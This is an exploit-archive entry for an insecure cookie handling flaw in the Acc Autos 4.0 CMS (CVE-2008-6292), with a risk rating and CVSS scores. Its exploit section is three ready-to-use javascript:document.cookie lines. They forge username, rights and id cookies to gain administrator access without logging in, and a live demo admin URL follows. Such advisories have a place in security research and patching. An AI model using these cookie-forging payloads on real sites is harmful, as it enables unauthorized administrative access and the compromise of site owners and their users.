Acc Autos 4.0 Insecure Cookie Handling Vulnerability

2009.03.01

Credit: x0r

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-6292

CWE: CWE-264

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

-==========================================-
Autore: x0r - Road Crew - Evolution Team
Cms: Acc Autos v4.0
Bug:  Insecure Cookie Handling
Site: http://pro7.altervista.org/v2/
-==========================================-
Exploit:

[+]javascript:document.cookie="username_cookie=admin";
[+]javascript:document.cookie="right_cookie=1";
[+]javascript:document.cookie="id_cookie=1";

Live Demo:

http://www.accscripts.com/autos/demo/admin/

Greetz: 8\10\2008..Il Sogni Diventa Realt&#195;...Bimb4 Ti AmO.

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Acc Autos 4.0 Insecure Cookie Handling Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Acc Autos 4.0 Insecure Cookie Handling Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.